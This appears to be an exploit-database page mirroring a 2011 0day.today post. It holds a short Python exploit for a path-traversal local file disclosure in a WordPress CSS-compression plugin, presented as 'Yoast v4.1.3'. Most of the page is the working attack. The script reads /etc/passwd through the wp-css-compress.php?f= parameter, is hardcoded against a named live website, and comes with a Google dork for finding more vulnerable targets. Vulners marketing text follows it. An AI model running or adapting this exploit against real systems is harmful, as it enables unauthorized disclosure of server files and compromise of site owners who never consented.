Lucene search
K

WordPress Yoast v4.1.3 Local File Disclosure Vulnerability

🗓️ 25 Aug 2011 00:00:00Reported by Angel InjectionType 
zdt
 zdt
🔗 0day.today👁 30 Views

WordPress Yoast v4.1.3 Local File Disclosure Vulnerability, Angel Injection, H7acker110, Miroslav Stampa

Code
#!/bin/python

print "###########################################################################"
print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#"
print "# Author:Angel Injection                                                  #"
print "# Home Page: http://dev-point.com http://sec-krb.org                      #"
print "# Exploit find By H7acker110                                              #"
print "# python exploit find By Miroslav Stampar                                 #"
print "# Note:Iam Angel Injection From the country of civilizations(iraq)        #"
print "# Google Dork:inurl:wp-css-compress.php?f=                                #"
print "###########################################################################"


 
import urllib2
 
FILEPATH = "/etc/passwd"
 
req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH)
 
print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())



#############################
print "Exploit Completed"
#############################
print "Inj3ct0r Team 4 ever"
#############################



#  0day.today [2018-03-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation